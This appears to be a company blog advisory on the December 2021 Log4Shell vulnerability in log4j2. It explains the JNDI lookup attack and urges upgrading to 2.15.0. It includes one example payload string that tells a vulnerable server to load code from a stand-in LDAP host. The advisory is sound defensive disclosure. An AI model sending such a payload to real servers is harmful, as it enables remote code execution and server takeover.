security

A zero-day vulnerability in log4j.

kevin-ku-w7ZyuGYNpRQ-unsplash

On Thursday, the 9th of December, a zero-day vulnerability was discovered in the popular logging library for Java, called log4j (version2). The proof of concept is already available on GitHub.

The vulnerability is recognized as quite severe, taking into account that it allows getting complete server control and is easy to perform. The library is widely used, so many of the servers were affected. The list of responses from the organizations whose servers were impacted is available here.

The exploit is present in log4j2 versions starting from 2.0 to 2.14.1. Currently, the fix is released as version 2.15.0.

The exploit can be reproduced if the server contains the vulnerable version of the library, has an endpoint with any protocol that allows sending the exploit string, and a log statement that logs out the request with the string.

The attack is performed in the following way:

  • The request with malicious string is being sent from the attacker to the server;
  • The server records the payload that contains a link to the server, controlled by the attacker. For example: {jndi:ldap://example.com/a};
  • The vulnerable server makes a request to the attacker server using Java Naming and Directory Interface (JNDI) and receives a response that includes a link to a remote Java class file;
  • The remote Java class file is being injected into the server and allows to execution of any code giving the attacker full access to the server.

So, if you’re using Java software on your servers, it is crucial to get the vulnerability patched as soon as possible.

Reading next

ian-bLuhWOE0jzA-unsplash
marvin-meyer-SYTO3xs06fU-unsplash

Interested in a specific business & technology topic and looking for an article in our blog but haven't found one yet?

If you haven't come across an article that matches your query, feel free to suggest the topic to us, and we'll consider featuring it in our blog. Share your suggestion in the form below, and we'll be sure to review your request.

Talk with us

If you have any questions or problems in your business that can be solved with technical solutions, just let us know. We'll do everything we can to help you.